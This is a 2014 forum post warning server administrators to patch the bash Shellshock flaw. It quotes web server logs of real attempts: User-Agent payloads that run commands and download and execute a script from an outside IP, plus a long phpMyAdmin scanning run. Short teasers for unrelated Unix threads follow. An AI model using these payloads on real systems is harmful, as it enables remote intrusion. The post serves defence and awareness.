09-30-2014
Hi Guys,
Just to let you know, if you are running any internet facing servers with the bash (shellshock) vulnerability still evident you are risking a major intrusion. I am now seeing a spike in activity, complexity and frequency of the attempts on my web servers.
Here is a sample of what I'm seeing.
Code :
54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:17 +0100] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "-"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
So if you're still unpatched - best get to it. The more advanced guys will be along very soon now.
There is still the script kiddy stuff as well, typically stuff like this.
Code :
210.51.47.229 - - [29/Sep/2014:11:29:43 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:46 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:48 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:50 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:53 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:55 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:57 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:59 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:01 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:04 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:06 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:08 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:09 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:11 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:13 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:15 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:17 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:19 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:20 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
But even that will improve, so better safe than sorry.
Regards
Dave
This User Gave Thanks to gull04 For This Post:
10 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hi all,
Basically Im trying to put the current time in a script in BASH. Tried the watch command, but its not really what I want.
I will have lots of things in this script, current date and time being just a few).
Any ideas? (4 Replies)
Discussion started by: mikejreading
4 Replies
2. Solaris
Hi all
I wish to undo the mirroring for root and update the Solaris version from 8 to 10. Since i am lack of knowledge and experience on this, hope you all can help me double check the step and correct me.
Existing disk groups details
root@leo # vxdg list
NAME STATE ID... (3 Replies)
Discussion started by: SmartAntz
3 Replies
3. Solaris
I want to update my solaris 10 server which is currently on update 3 stage.
A new application require it to be on update 6.
What is the best way to make it update 6.
should i just install the patch or should i go for the liveupgrade??
thanks for you help in advance (3 Replies)
Discussion started by: uxravi
3 Replies
4. Shell Programming and Scripting
Hi
I don't have chsh option.
I want to launch bash instead of ksh ( or launch bash from ksh .profile)
how can I do this ? (1 Reply)
Discussion started by: Sivaswami
1 Replies
5. Shell Programming and Scripting
Hello,
I want to check the value of all MySQL columns.(column name is "status") via bash script.
If value is "0" at I want to make only single column value to "1"
I have many "0" values on mysql database(on "status" column)
"0" means it is a draft post. I want to publish a post. I... (2 Replies)
Discussion started by: tara123
2 Replies
6. News, Links, Events and Announcements
Not sure if there is a post about it here somewhere already. Anyway:
Remote exploit vulnerability in bash CVE-2014-6271 | CSO Online (3 Replies)
Discussion started by: zaxxon
3 Replies
7. Red Hat
Hi
i want to update the BASH because of the "shell shock" vulnerability.
my RedHat 5 is clean install with the default mirror site.
when im running the command: yum update bash
im getting a message saying there is no update. you can see in the attach picture...
what am i doing wrong? is... (4 Replies)
Discussion started by: guy3145
4 Replies
8. Shell Programming and Scripting
In the below bash there are 6 .txt files in /home/cmccabe/Desktop/comparison/ref_val/ that are being updated from the 6 .vcf files in /home/cmccabe/Desktop/comparison/validation/files/*.vcf. The awk in the post updates the files with the information, however the files are not being updated so the... (0 Replies)
Discussion started by: cmccabe
0 Replies
9. Shell Programming and Scripting
In this post at 302451613-post2.html the link to the code comes up not found. The thread is closed, so I was unable to ask on the thread itself and I do not have enough posts yet to send a private message (or write out a proper html link). Does the author (jim mcanamara) have an updated link?
... (2 Replies)
Discussion started by: matthewpersico
2 Replies
10. Solaris
Hi friends,
We have a Solaris machine running 10 update 3
-bash-3.2# cat /etc/release
Solaris 10 11/06 s10s_u3wos_10 SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
... (6 Replies)
Discussion started by: prvnrk
6 Replies